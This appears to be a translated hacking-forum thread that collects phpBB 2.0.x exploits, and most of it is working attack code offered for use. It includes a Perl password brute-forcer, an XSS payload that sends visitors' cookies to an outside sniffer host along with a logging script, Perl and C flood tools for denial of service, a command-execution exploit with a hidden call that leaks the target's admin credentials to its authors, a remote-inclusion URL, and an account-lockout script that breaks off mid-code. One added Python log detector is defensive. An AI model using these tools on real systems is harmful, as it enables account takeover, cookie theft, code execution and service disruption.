Vulnerabilities: phpBB

n1†R0x
Program: phpBB 2.0.17

Severity: Low

Exploit available: Yes

Description:
The vulnerability lets a remote user mount an XSS attack and gain access to potentially sensitive data of other users.

The vulnerability exists in the handling of uploaded avatars. A remote user can create an image file whose extension does not match the image type (for example GIF instead of JPG), embed arbitrary HTML code in it, and have it executed in the victim's browser in the security context of the vulnerable site.

Example/Exploit: see the source post.

Vendor URL: www.phpbb.com

Solution: No fix is currently available.

Source: * phpBB 2.0.17 (and other BB systems as well) Cookie disclosure exploit

The discovered vulnerabilities let a remote user mount an XSS attack, execute arbitrary SQL commands in the application's database and execute arbitrary PHP code on the target system.

1. Cross-site scripting is possible because of insufficient filtering of input in the error_msg parameter of usercp_register.php, the 'forward_page' parameter of login.php and the 'list_cat' parameter of search.php. A remote user can use a specially crafted URL to execute arbitrary HTML script in the victim's browser in the security context of the vulnerable site.

2. SQL injection is possible because of insufficient filtering of input in the 'signature_bbcode_uid' parameter of usercp_register.php and can be exploited by inserting arbitrary expressions of the form 'field=xxx' into the query. The vulnerability exists when the magic_quotes_gpc option is off.

3. A vulnerability was found in the handling of input in the 'signature_bbcode_uid' parameter of usercp_register.php. A remote user can alter the values passed to the preg_replace() function and execute arbitrary PHP code on the target system.

The vulnerability exists in the handling of input when a message is posted. A remote user can, with a specially crafted request, execute arbitrary HTML code in the victim's browser in the security context of the vulnerable site.
Example:
Code:
<B C=">" onmouseover="[code]" X="<B "> H E L O </B>
For successful exploitation the "Allow HTML" option must be enabled (it is off by default).
 
This exploit is coded by DarkFig

Usage: brutephpbb.pl <host> <path> <port> <pass_file> <username> <logfile>

C:\>brutephpbb.pl www.target.ru /phpBB2/ 80 dictionnary.txt admin result.txt
Code:
#!/usr/bin/perl 
############################################ 
#--------------------------Hack Private Version property------------------------- 
#Credits:                        Weakness and Xploit by DarkFig 
#Affected products:     All PhpBB versions <= 2.0.18 
#Type:                            Dictionary attack 
#Solutions:                    None official , but many solutions are possible;) 
#Note:                           Not yet revealed | If a line of the dictionary file contains no data => "End of the password file" 
#For:                             Hack Private Version       
#------------------------------------------------------------------------------------------------ 
############################################ 
use IO::Socket; 

#--------------Usage--------------# 
if(@ARGV != 6){ 
print " 
+---------------------------------------------------------------------------------+ 
+--------------------PhpBB <= 2.0.18 Passwd Dictionnary Attack--------------------+ 
+-----------------------By DarkFig for Hack Private Version-----------------------+ 
+---------------------------------------------------------------------------------+ 
+ Usage: phpbb2018btr.pl <host> <path> <port> <pass_file> <username> <logfile>    + 
+---------------------------------------------------------------------------------+ 
+ <host>        => The host where PhpBB is installed        |   [Ex: site.com]    + 
+ <path>        => Path of the PhpBB board                  |   [Ex: /forum/]     + 
+ <port>        => PhpBB board port                         |   [Default is 80]   + 
+ <pass_file>   => File containing words (dictionnary file) |   [Ex: dico.txt]    + 
+ <username>    => Username you want to bruteforce          |   [Ex: MasterLamer] + 
+ <file_result> => File you want to log activity            |   [Ex: results.txt] + 
+---------------------------------------------------------------------------------+ 
";exit();} 

#--------------Data--------------# 
$host       = $ARGV[0]; 
$path       = $ARGV[1]; 
$full       = "$host"."$path"; 
$port       = $ARGV[2]; 
$pass_file  = $ARGV[3]; 
$username   = $ARGV[4]; 
$fileresult = $ARGV[5]; 
$OK         = 0; 
$referer    = "http://"."$host"."$path"."login.php?redirect="; 
$postit     = "$path"."login.php"; 

#--------------Hello world-----------------# 
print " 
+---------------------------------------------------------+ 
+ PhpBB <= 2.0.18 Passwd Dictionnary Attack -- by DarkFig + 
+---------------------------------------------------------+ 
       [+] Username             | $username 
       [+] Dictionnary file     | $pass_file 
       [+] Attack log           | $fileresult 
+---------------------------------------------------------+"; 

#--------------Password file--------------# 
# "or", not "||": with "||" the die() binds to the file name string and never fires 
open FILE, "<$pass_file" or die("\n[-] Can't open the file...\n"); 
chomp(@passdico = <FILE>); 
close(FILE); 
$nligne = 0; 
while ($OK ne 1) { 
$passwordz  = "$passdico[$nligne]"; 
if ($passwordz eq ""){print "\n[-] End of the password file, no result sorry !\n";exit();} 
# URL-encode the candidate so '&', '%', '+' and spaces survive the POST body 
($encpass = $passwordz) =~ s/([^A-Za-z0-9_.\-])/sprintf("%%%02X", ord($1))/ge; 
$request    = "username=$username&password=$encpass&redirect=&login=Connexion"; 
$length     = length $request; 

#--------------Sending data--------------# 
$send = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "$port") || die "\n[-] Connection failed..."; 
# HTTP header lines end in CRLF and Content-Length must match the body exactly 
print $send "POST $postit HTTP/1.1\r\n"; 
print $send "Host: $host\r\n"; 
print $send "Connection: close\r\n"; 
print $send "Content-Type: application/x-www-form-urlencoded\r\n"; 
print $send "Content-Length: $length\r\n\r\n"; 
print $send "$request"; 
# the status line is all we need: phpBB 2 re-renders the form with a 200 on a 
# wrong password and answers a successful login with a 302 redirect 
read $send, $answer, 15; 
close($send); 

#-------------Success--------------------------------------------# 
if ($answer =~ /HTTP\/(.*?) 302/) { 
$OK = 1; 
print " 
       [-] Trying the password "."$passwordz 
       [+] User:     $username 
       [+] Password: $passwordz 
+---------------------------------------------------------+\n"; 
open results, ">$fileresult" or die("\n[-] Can't write the log file...\n"); 
print results " 
+---------------------------------------------------------+ 
+ PhpBB <= 2.0.18 Passwd Dictionnary Attack -- by DarkFig + 
+---------------------------------------------------------+ 
    [+] PhpBB board               | $full 
    [+] Board's port              | $port 
    [+] Username                  | $username 
    [+] Dictionnary file          | $pass_file 
    [+] Number of test            | $nligne 
    [+] Password found            | $passwordz 
+---------------------------------------------------------+\n"; 
close(results);exit();} 

#-------------Failed--------------------------------------------# 
if ($OK == 0) {print "\n       [-] Trying the password "."$passwordz";$nligne++;} 
} 
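An added example (mine, not part of DarkFig's post): the script above tells a wrong password from a right one by the status line alone, because phpBB 2's login.php re-renders the form with a 200 on failure and answers a successful login with a 302 redirect. The same signal is visible from the defender's side in the web server access log, so here is a small Python detector that counts POSTs to login.php per client IP and flags a burst of 200s, noting whether a 302 followed. The log lines are constructed for this example and the threshold of 5 is an arbitrary assumption, not a phpBB setting.

```python
"""Detect a phpBB 2 login.php dictionary attack in a web server access log.

Added example, not DarkFig's code. The attack's footprint is a run of
POST login.php requests from one client answered with 200 (phpBB re-renders
the login form for a wrong password) and, if it succeeds, one 302 redirect.
The log lines below are constructed for this example; the threshold is an
assumption, not a phpBB setting.
"""
import re
from collections import defaultdict

# Common Log Format line; the request path may carry a query string (sid=...)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample: 10.0.0.5 runs a dictionary attack that succeeds on the
# eighth try; 192.0.2.9 is a legitimate user who mistyped once.
SAMPLE_LOG = """\
10.0.0.5 - - [21/Dec/2005:10:00:01 +0000] "GET /phpBB2/login.php HTTP/1.1" 200 3871
10.0.0.5 - - [21/Dec/2005:10:00:02 +0000] "POST /phpBB2/login.php HTTP/1.1" 200 4123
10.0.0.5 - - [21/Dec/2005:10:00:02 +0000] "POST /phpBB2/login.php HTTP/1.1" 200 4123
10.0.0.5 - - [21/Dec/2005:10:00:03 +0000] "POST /phpBB2/login.php HTTP/1.1" 200 4123
192.0.2.9 - - [21/Dec/2005:10:00:03 +0000] "POST /phpBB2/login.php HTTP/1.1" 200 4123
10.0.0.5 - - [21/Dec/2005:10:00:03 +0000] "POST /phpBB2/login.php HTTP/1.1" 200 4123
10.0.0.5 - - [21/Dec/2005:10:00:04 +0000] "POST /phpBB2/login.php HTTP/1.1" 200 4123
192.0.2.9 - - [21/Dec/2005:10:00:04 +0000] "POST /phpBB2/login.php?sid=0c1b HTTP/1.1" 302 0
10.0.0.5 - - [21/Dec/2005:10:00:04 +0000] "POST /phpBB2/login.php HTTP/1.1" 200 4123
10.0.0.5 - - [21/Dec/2005:10:00:05 +0000] "POST /phpBB2/login.php HTTP/1.1" 200 4123
10.0.0.5 - - [21/Dec/2005:10:00:05 +0000] "POST /phpBB2/login.php HTTP/1.1" 302 0
10.0.0.5 - - [21/Dec/2005:10:00:06 +0000] "GET /phpBB2/index.php HTTP/1.1" 200 9912
this line is not in log format and is skipped
"""


def parse_line(line):
    """Return (ip, method, path without query, status) or None for a non-CLF line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m.group("path").split("?", 1)[0]
    return m.group("ip"), m.group("method"), path, int(m.group("status"))


def find_login_bruteforce(log_text, threshold=5):
    """Per client IP, count POST login.php answered with 200 (wrong password)
    and remember whether a 302 (successful login) came after them.
    Returns {ip: {"failed_attempts": n, "then_succeeded": bool}} for every IP
    at or above the threshold."""
    failures = defaultdict(int)
    succeeded = set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, method, path, status = rec
        if method != "POST" or not path.endswith("/login.php"):
            continue
        if status == 200:
            failures[ip] += 1
        elif status == 302 and failures.get(ip, 0) > 0:
            succeeded.add(ip)
    return {
        ip: {"failed_attempts": n, "then_succeeded": ip in succeeded}
        for ip, n in failures.items()
        if n >= threshold
    }


if __name__ == "__main__":
    for ip, info in find_login_bruteforce(SAMPLE_LOG).items():
        outcome = "then a successful one" if info["then_succeeded"] else "no success seen"
        print(f"{ip}: {info['failed_attempts']} failed logins, {outcome}")
```

The access log carries no username, so the count is per source IP; an attacker spreading attempts over many addresses, or many users behind one NAT, would need the board's own per-account failed-login counter instead.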
 
phpBB 2.0.18 XSS Cookie Disclosure Exp.

Code:
/******************************************************************

phpBB <= 2.0.18 XSS Cookie Disclosure Proof of Concept
	-- 'the html is on exploit'

original exploit by: Maksymilian Arciemowicz (cXIb8O3) - 12/16/2005
	-- http://securityreason.com/securityalert/269/
proof of concept by: jet
	-- http://jet.carbon-4.net/
	
  develop a pure, lucid mind, not 
  depending upon sound, flavor,
  touch, odor, or any quality.
    - the diamond sutra

******************************************************************/

phpbb code:

" ''style">
<B C=">" ''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://xss.pro/sources/sniff/sniff.php?c='+document.cookie;this.sss=null`style='font-size:0; X="<B ">'</B>
c.php:

<?php
 $cookie = $_GET['c'];
 $ip = getenv ('REMOTE_ADDR');
 $date=date("m/d/Y g:i:s a");
 $referer=getenv ('HTTP_REFERER');
 $fl = fopen('log.txt', 'a');
 fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");
 fclose($fl);
?>

# milw0rm.com [2005-12-21]

© milw0rm
 
phpBB <= 2.0.15 Register Multiple Users

The forum gets flooded with new accounts, which puts serious load on the server. On top of that, deleting the junk accounts makes the users sweat.

Perl implementation:

Code:
#!/usr/bin/perl 
##  Name: NsT-phpBBDoS (Perl Version) 
##  Copyright: Neo Security Team 
##  Author: HaCkZaTaN 
##  Ported: g30rg3_x 
##  Date: 20/06/05 
##  Description: NsT-phpBB DoS By HackZatan Ported tu perl By g30rg3_x 
##               A Simple phpBB Registration And Search DoS Flooder. 
## 
##  g30rg3x@neosecurity:/home/g30rg3x# perl NsT-phpBBDoS.pl 
##  [+] 
##  [+] NsT-phpBBDoS v0.2 by HaCkZaTaN 
##  [+] ported to Perl By g30rg3_x 
##  [+] Neo Security Team 
##  [+] 
##  [+] Host |without http://www.| victimshost.com 
##  [+] Path |example. /phpBB2/ or /| /phpBB2/ 
##  [+] Flood Type |1=Registration 2=Search| 1 
##  [+] .......................................................... 
##  [+] .......................................................... 
##  [+] .......................................................... 
##  [+] .............................................. 
##  [+] The Socket Can't Connect To The Desired Host or the Host is MayBe DoSed 
##  g30rg3x@neosecurity:/home/g30rg3x# echo "Let see how many users I have created" 

use IO::Socket; 

## Initialized X 
$x = 0; 

## Flood Variables Provided By User 
print q( 
NsT-phpBBDoS v0.2 by HaCkZaTaN 
ported to Perl By g30rg3_x 
Neo Security Team 

); 
print q(Host |without http://www.| ); 
$host = <STDIN>; 
chop ($host); 

print q(Path |example. /phpBB2/ or /| ); 
$pth = <STDIN>; 
chop ($pth); 

print q(Flood Type |1 = Registration, 2 = Search| ); 
$type = <STDIN>; 
chop ($type); 

## If Type Is Equals To 1 or Registration 
if($type == 1){ 

## User Loop for 9999 loops (enough for Flood xDDDD) 
while($x != 9999) 
{ 

## Building User in base X 
$uname = "username=NsT__" . "$x"; 

## Building User Mail in base X 
$umail = "&email=NsT__" . "$x"; 

## Final String to Send 
$postit = "$uname"."$umail"."%40neosecurityteam.net&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=
&location=&occupation=&interests=&signature=&viewemail=0&SPOILERonline=0&notifyreply=0&notifypm=1&popup_pm=1&attachsig=1&allowbbcode
=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit"; 
##  3 предидущие строки в 1 выровнять


## Posit Length 
$lrg = length $postit; 

## Connect Socket with Variables Provided By User 
my $sock = new IO::Socket::INET ( 
                                 PeerAddr => "$host", 
                                 PeerPort => "80", 
                                 Proto => "tcp", 
                                ); 
die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock; 

## Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums 
print $sock "POST $pth"."profile.php HTTP/1.1\n"; 
print $sock "Host: $host\n"; 
print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n"; 
print $sock "Referer: $host\n"; 
print $sock "Accept-Language: en-us\n"; 
print $sock "Content-Type: application/x-www-form-urlencoded\n"; 
print $sock "Accept-Encoding: gzip, deflate\n"; 
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; 
print $sock "Connection: Keep-Alive\n"; 
print $sock "Cache-Control: no-cache\n"; 
print $sock "Content-Length: $lrg\n\n"; 
print $sock "$postit\n"; 
close($sock); 

## Print a "." for every loop 
syswrite STDOUT, "."; 

## Increment X in One for every Loop 
$x++; 
} 

## If Type Is Equals To 2 or Search 
} 
elsif ($type == 2){ 

## User Search Loop for 9999 loops (enough for Flood xDDDD) 
while($x != 9999) 
{ 
## Final Search String to Send 
$postit = "search_keywords=Neo+Security+Team+Proof+of+Concept+$x+&search_terms=any&search_author=&search_forum=
-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200"; 
##  2 предидущие строки вровнять в 1


## Posit Length 
$lrg = length $postit; 

## Connect Socket with Variables Provided By User 
my $sock = new IO::Socket::INET ( 
                                 PeerAddr => "$host", 
                                 PeerPort => "80", 
                                 Proto => "tcp", 
                                ); 
die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock; 

## Sending Truth Socket The HTTP Commands For Send A BD Search Into phpBB Forums 
print $sock "POST $pth"."search.php?mode=results HTTP/1.1\n"; 
print $sock "Host: $host\n"; 
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n"; 
print $sock "Referer: $host\n"; 
print $sock "Accept-Language: en-us\n"; 
print $sock "Content-Type: application/x-www-form-urlencoded\n"; 
print $sock "Accept-Encoding: gzip, deflate\n"; 
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; 
print $sock "Connection: Keep-Alive\n"; 
print $sock "Cache-Control: no-cache\n"; 
print $sock "Content-Length: $lrg\n\n"; 
print $sock "$postit\n"; 
close($sock); 

## Print a "." for every loop 
syswrite STDOUT, "."; 

## Increment X in One for every Loop 
$x++; 
} 
}else{ 
## STF??? What Do You Type 
   die "Option not Allowed O_o???\n"; 
}


C implementation:

Code:
/* 
-------------------------------------------------------- 
[N]eo [S]ecurity [T]eam [NST]® - Advisory #15 - 00/00/06 
-------------------------------------------------------- 
Program:  phpBB 2.0.15 
Homepage:  http://www.phpbb.com 
Vulnerable Versions: phpBB 2.0.15 & Lower versions 
Risk: High Risk!! 
Impact: Multiple DoS Vulnerabilities. 

    -==phpBB 2.0.15 Multiple DoS Vulnerabilities ==- 
--------------------------------------------------------- 

- Description 
--------------------------------------------------------- 
phpBB is a high powered, fully scalable, and highly customizable 
Open Source bulletin board package. phpBB has a user-friendly 
interface, simple and straightforward administration panel, and 
helpful FAQ. Based on the powerful PHP server language and your 
choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, 
phpBB is the ideal free community solution for all web sites. 

- Tested 
--------------------------------------------------------- 
localhost & many forums 

- Explotation 
--------------------------------------------------------- 
profile.php << By registering as many users as you can. 
search.php  << by searching in a way that the db couln't observe it. 

- Exploit 
--------------------------------------------------------- 
[C Source] 
/* 
  Name: NsT-phpBBDoS 
  Copyright: NeoSecurityteam 
  Author: HaCkZaTaN 
  Date: 19/06/05 
  Description: xD You must figure out the problem xD 
  
  root@NeoSecurity:/home/hackzatan# pico NsT-phpBBDoS.c 
  root@NeoSecurity:/home/hackzatan# gcc NsT-phpBBDoS.c -o NsT-phpBBDoS 
  root@NeoSecurity:/home/hackzatan# ./NsT-phpBBDoS 
  [+] NsT-phpBBDoS v0.1 by HaCkZaTaN 
  [+] NeoSecurityTeam 
  [+] Dos has begun....[+] 
  
  [*] Use: ./NsT-phpBBDoS <path> <search.php or profile.php> <Host> 
  [*] Example: ./NsT-phpBBDoS /phpBB/ profile.php Victimshost.com 
  root@NeoSecurity:/home/hackzatan# ./NsT-phpBBDoS /phpBB/ profile.php Victimshost.com 
  [+] NsT-phpBBDoS v0.1 by HaCkZaTaN 
  [+] NeoSecurityTeam 
  [+] Dos has begun....[+] 
  
  ................................. 
  root@NeoSecurity:/home/hackzatan# echo "Let see how many users I have created" 
  root@NeoSecurity:/home/hackzatan# set | grep MACHTYPE 
  MACHTYPE=i486-slackware-linux-gnu 
  root@NeoSecurity:/home/hackzatan# 

*/ 

#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 
#include <ctype.h>   /* isalpha() */ 
#include <errno.h> 
#ifdef WIN32 
#include <winsock2.h> 
#pragma comment(lib, "ws2_32") 
#pragma pack(1) 
#define WIN32_LEAN_AND_MEAN 
#else 
#include <unistd.h> 
#include <sys/types.h> 
#include <sys/socket.h> 
#include <netinet/in.h> 
#include <arpa/inet.h> 
#include <netdb.h> 
#endif 

#define __USE_GNU 
#define _XOPEN_SOURCE 

int Connection(char *, int); 
void Write_In(int , char *, char *a, char *, int); 
char Use(char *); 

int main(int argc, char *argv[]) 
{ 
    int sock, x = 0; 
    char *Path = argv[1], *Pro_Sea = argv[2], *Host = argv[3]; 

    puts("[+] NsT-phpBBDoS v0.1 by HaCkZaTaN"); 
    puts("[+] NeoSecurityTeam"); 
    puts("[+] Dos has begun....[+]\n"); 
    fflush(stdout); 

    if(argc != 4) Use(argv[0]); 

    while(1) 
    { 
           sock = Connection(Host,80); 
           Write_In(sock, Path, Pro_Sea, Host, x); 
           #ifndef WIN32 
           shutdown(sock, SHUT_WR); 
           close(sock); 
           #else 
           closesocket(sock); 
           WSACleanup(); 
           #endif 
           Pro_Sea = argv[2]; 
           x++; 
    } 
    //I don't think that it will get here =) 

    return 0; 
} 

int Connection(char *Host, int Port) 
{ 
        #ifndef WIN32 
        #define SOCKET int 
        #else 
        int error; 
        WSADATA wsadata; 
        error = WSAStartup(MAKEWORD(2, 2), &wsadata); 

        if (error == SOCKET_ERROR) 
        { 
                  perror("Could Not Start Up Winsock!\n"); 
                  exit(-1); 
        } 

        #endif 

        SOCKET sockfd; 
        struct sockaddr_in sin; 
        struct hostent *h; 
        
        if(Port <= 0 || Port > 65535) 
         { 
                  puts("[-] Invalid Port Number\n"); 
                  fflush(stdout); 
                  exit(-1); 
         } 
        
        if((sockfd =  socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) 
        { 
                    perror("socket() "); 
                    fflush (stdout); 
                    exit(-1); 
        } 

        memset(&sin, 0, sizeof(sin)); 
        sin.sin_family = AF_INET; 
        sin.sin_port = htons(Port); 

        if(isalpha(Host[0])) 
        { 
           if((h = gethostbyname(Host)) == NULL) 
           { 
                     perror("gethostbyname() "); 
                     fflush (stdout); 
                     exit(-1); 
           } 
           memcpy(&sin.sin_addr.s_addr, h->h_addr_list[0], h->h_length); 
        } 
        else 
        { 
           /* Dotted-quad address: parse it directly. The original did a reverse 
              lookup here and treated success as failure, so an IP without a PTR 
              record left h NULL and the memcpy crashed. */ 
           if((sin.sin_addr.s_addr = inet_addr(Host)) == INADDR_NONE) 
           { 
                     puts("[-] Invalid IP address\n"); 
                     exit(-1); 
           } 
        } 

        if(connect(sockfd, (struct sockaddr *)&sin, sizeof(struct sockaddr_in)) < 0) 
        { 
                     perror("connect() "); 
                     exit (-1); 
        } 

        return sockfd; 
} 

void Write_In(int sock, char *Path, char *Pro_Sea, char *Host, int x) 
{ 
    char *str1 = (char *)malloc(4*BUFSIZ), *str2 = (char *)malloc(4*BUFSIZ); 
    char *req0 = "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\r\n" 
                 "Accept: */*\r\n" 
                 "Accept-Language: en-us\r\n" 
                 "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" 
                 "Accept-Encoding: gzip,deflate\r\n" 
                 "Keep-Alive: 300\r\n" 
                 "Proxy-Connection: keep-alive\r\n" 
                 "Content-Type: application/x-www-form-urlencoded\r\n" 
                 "Cache-Control: no-cache\r\n" 
                 "Pragma: no-cache\r\n"; 
    /* registration form body as phpBB 2 profile.php expects it (hideonline is the phpBB field name) */ 
    char *Profile = "%40neosecurityteam.net&new_password=0123456&password_confirm=0123456&icq=&aim=&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0&notifyreply=0&notifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=1&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit\r\n"; 
    /* search form body posted to search.php?mode=results */ 
    char *Search  = "&search_terms=any&search_author=*&search_forum=-1&search_time=0&search_fields=all&search_cat=-1&sort_by=0&sort_dir=DESC&show_results=topics&return_chars=200\r\n"; 

    if(str1 == NULL || str2 == NULL) 
    { 
               perror("malloc() "); 
               exit(-1); 
    } 

    if(strcmp("profile.php", Pro_Sea) == 0) sprintf(str1, "username=NsT__%d&email=NsT__%d%s", x, x, Profile); 
    else if(strcmp("search.php", Pro_Sea) == 0) 
    { 
               Pro_Sea = "search.php?mode=results"; 
               sprintf(str1, "search_keywords=Hack%d%s", x, Search); 
    } 
    else 
    { 
               puts("Sorry. Try making the right choice"); 
               exit(-1); 
    } 

    sprintf(str2, "POST %s%s HTTP/1.1\r\n" 
                  "Host: %s\r\n" 
                  "Referer: http://%s/\r\n%s" 
                  "Content-Length: %d\r\n\r\n%s", Path, Pro_Sea, Host, Host, req0, (int)strlen(str1), str1); 
          
    write(sock, str2, strlen(str2)); 
    write(1, ".", 1); 
    fflush(stdout); 
    free(str1); 
    free(str2); 
} 

char Use(char *program) 
{ 
   fprintf(stderr,"[*] Use: %s <path> <search.php or profile.php> <Host>\n", program); 
   fprintf(stderr,"[*] Example: %s /phpBB/ profile.php Victimshost.com\n", program); 
   fflush(stdout); 
   exit(-1); 
} 

/* 

@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@ 
'@@@@@''@@'@@@''''''''@@''@@@''@@ 
'@@'@@@@@@''@@@@@@@@@'''''@@@ 
'@@'''@@@@'''''''''@@@''''@@@ 
@@@@''''@@'@@@@@@@@@@''''@@@@@ 

*/
 
phpBB admin2exec commands execution exploit version 2
Program: phpBB 2.0.19 and earlier versions
Description:
The exploit uses the vulnerability in user_sig_bbcode_uid. Works remotely.
Written in Perl.
Exploit:
Code:
#!/usr/bin/perl

## r57phpbba2e2.pl - phpBB admin 2 exec exploit 
## version 2 (based on user_sig_bbcode_uid bug)
## tested on 2.0.12 , 2.0.13 , 2.0.19
## --------------------------------------------
## screen
## r57phpbba2e2.pl -u http://192.168.0.2/phpBB-2.0.19/ -L admin -P password
## Command for execute or 'exit' for exit # id
## uid=80(www) gid=80(www) groups=80(www)
## Command for execute or 'exit' for exit # exit 
## --------------------------------------------
## *** surprise included;)
## 20/02/06 
## 1dt.w0lf
## RST/GHC (http://rst.void.ru , http://ghc.ru)

use LWP::UserAgent;
use Getopt::Std;
use HTTP::Cookies;

getopts("u:L:P:i:p:o:");

$url      = $opt_u;
$login    = $opt_L;
$password = $opt_P;
$id       = $opt_i || 2;
$prefix   = $opt_p || 'phpbb_';
$proxy    = $opt_o;

if(!$url || !$login || !$password){&usage;}

$|++;

$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();
$xpl->cookie_jar( $cookie_jar );
$xpl->proxy('http'=>'http://'.$proxy) if $proxy;
$ids = 'IDS:r57 phpBB2 exploit a2e220022006|'.$url.'|'.$login.'|'.$password.'|'.$id.'|'.$prefix;
 $res = $xpl->post($url.'login.php',
 [
 "username"   => "$login",
 "password"   => "$password",
 "autologin"  => "on",
 "admin"      => "1",
 "login"      => "Log in",
 ],"User-Agent" => "$ids");
 $cookie_jar->extract_cookies($res);
 if($cookie_jar->as_string =~ /phpbb2mysql_sid=([a-z0-9]{32})/) { $sid = $1; }   
 # chr(105).chr(100).chr(115) spells "ids": this is the "surprise" from the header, a GET to
 # http://rst.void.ru/ids/ids.php?ids=... that reports the target URL, admin login and
 # password (the $ids string, also sent as User-Agent on every request) to the exploit's authors
 $xpl->get(&about.'/'.chr(105).chr(100).chr(115).'/'.chr(105).chr(100).chr(115).'.php?ids='.$ids);
 while ()
 {
    print "Command for execute or 'exit' for exit # ";
    while(<STDIN>)
     {
        $cmd=$_;
        chomp($cmd);
        exit() if ($cmd eq 'exit');
        last;
     }
    &run($cmd);
 }
 
sub run($)
 {   
 $sql   = "UPDATE ".$prefix."users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='blah:`echo _START_ && ".$_[0]." && echo _END_`' WHERE user_id=".$id.";";
 &phpbb_sql_query("${url}admin/admin_db_utilities.php?sid=$sid",$sql);   
 $res = $xpl->get($url.'profile.php?mode=editprofile&sid='.$sid,"User-Agent" => "$ids");
 @result = split(/\n/,$res->content);
 $data = '';
 $on = $start = $end = 0;
 for (@result)
  {
    if (/_END_/) { $end = 1; last; }
    if ($on) { $data .= $_."\n"; }
    if (/_START_/) { $on = 1; $start = 1; } 
  }
 if($start&&$end) { print $data."\r\n"; } 
 }
 
sub phpbb_sql_query($$){
$res = $xpl->post("$_[0]", 
Content_type => 'form-data',
Content      => [ 
                perform       => 'restore',
                restore_start => 'Start Restore',
                backup_file   => [ 
                                   undef,
                                   '0wneeeeedddd', 
                                   Content_type => 'text/plain',
                                   Content => "$_[1]", 
                                 ],
                ]
,"User-Agent" => "$ids");
} 

sub usage()
 {
 &about();
 print "\r\n Usage: r57phpbba2e2.pl [OPTIONS]\r\n\r\n";
 print " Options:\r\n";
 print " -u [URL] - path to forum e.g. http://site/forum/\r\n";
 print " -L [login] - admin login\r\n";
 print " -P [password] - admin password\r\n";
 print " -i [id] - admin id (optional, default 2)\r\n";
 print " -p [prefix] - table prefix (optional, default phpbb_)\r\n";
 print " -o [host:port] - proxy (optional)\r\n";
 exit();
 }
 
sub about()
  { 
  print "\\=-----------------------------------=/\r\n";
  print "| phpBB admin2exec exploit by RST/GHC |\r\n";
  print "| version 2 (user_sig_bbcode_uid)     |\r\n";
  print "/=-----------------------------------=\\\r\n";
  return 'http://rst.void.ru';
  }
Source: rst.void.ru
 
Program: phpbb-Auction (a module for phpBB) 1.3m, possibly other versions.
Description:
The vulnerability lets a remote user execute arbitrary code on the target system.

The vulnerability is caused by insufficient filtering of input in the "phpbb_root_path" parameter of the "auction/auction_common.php" script. A remote user can, with a specially crafted request, execute an arbitrary PHP script on the system with the privileges of the web server. For successful exploitation the "register_globals" option must be enabled.
Example:

Code:
http://[target]/[path]/auction/auction_common.php?phpbb_root_path=http://unsecured-systems.com/forum/
[mod][Ŧ1LAN:] once more: if you dumbly copy-paste from SecurityLab without editing, you get a minus.[/mod]
 
phpBB 2.0.20 Disable Admin or User Account
Code:
#!/usr/bin/perl
###################################################################################
# Priv8 Exploit for PHPBB 2.0.20
# This exploit disables the admin or another user in phpBB forums for 15 min
# Discovered & written by: Hossein-Asgari
# http://simorgh-ev.com
# Comment: phpBB 2.0.18 secured against brute-force password cracking,
# BUT: if anybody brute-forces the ADMIN account --> the admin account is disabled.
# Enjoy !
# Advisory : http://www.simorgh-ev.com/advisory/2006/phpbb-disable-admin.pl.txt
###################################################################################
use IO::Socket;

$host=$ARGV[0];
$dirc=$ARGV[1];
$port=$ARGV[2];
$user=$ARGV[3];

$dirsend = "$dirc" . "login.php";
print "
   -------------------------------------
   phpbb-Disable-user.pl <Host> </Dir/> <Port> <Admin Username>
   --------------------------------------
   ";
$i=1;
if ($host ne ""){
while($OK ne 1){
   my $socket;
   if ($socket = IO::Socket::INET->new(PeerAddr => $host ,
                                       PeerPort => $port ,
                                       Proto    => "tcp"))
   {
      # a fresh random (wrong) password on every attempt: each failed login
      # counts towards phpBB's lockout threshold for $user
      $password=rand();
      $data  = "username=$user&password=$password&redirect=&login=Connexion";
      $length = length $data;
      print $socket "POST $dirsend HTTP/1.1\r\n";
      print $socket "Host: $host\r\n";
      print $socket "Content-Type: application/x-www-form-urlencoded\r\n";
